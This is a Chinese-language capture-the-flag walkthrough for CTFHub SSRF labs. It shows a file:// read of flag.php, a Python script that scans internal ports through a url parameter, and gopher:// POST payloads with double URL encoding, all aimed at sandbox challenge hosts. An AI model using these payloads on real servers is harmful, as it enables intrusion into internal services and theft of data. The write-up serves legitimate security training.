CTFHub
内网访问
直接请求服务器本地 flag.php 文件
伪协议读取文件
file:///var/www/html/flag.php
端口扫描
访问未开放端口不显示信息
探测开放端口
# port.py
import requests
for i in range(8000,9001):
url = f"http://challenge-80bae7467b23066f.sandbox.ctfhub.com:10800/?url=http://127.0.0.1:{i}"
print(f"[{i}]"+url)
res = requests.get(url=url)
if len(res.content) != 0:
print(i)
break
POST 请求(gopher)
需要让服务器发送 post 请求
访问 flag,bp 抓包获取 key
?url=http://127.0.0.1/flag.php
构造 post 请求
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=7c1031172cade4f3a5eb3fe0417dbd1f
hackbar 编辑 url,并对 POST 内容进行 url 编码,注意使用 gopher gopher://127.0.0.1:80/_POST
中的 80 端口和 POST 前的 _
http://challenge-e3cab89d8da742f6.sandbox.ctfhub.com:10800/
?url=gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=7c1031172cade4f3a5eb3fe0417dbd1f
编码 POST 请求,将换行的位置编码出来的 %0A
前加 %0D
http://challenge-e3cab89d8da742f6.sandbox.ctfhub.com:10800/
?url=gopher://127.0.0.1:80/_POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Akey%3D7c1031172cade4f3a5eb3fe0417dbd1f
再次编码
http://challenge-e3cab89d8da742f6.sandbox.ctfhub.com:10800/
?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D7c1031172cade4f3a5eb3fe0417dbd1f
上传,获取 flag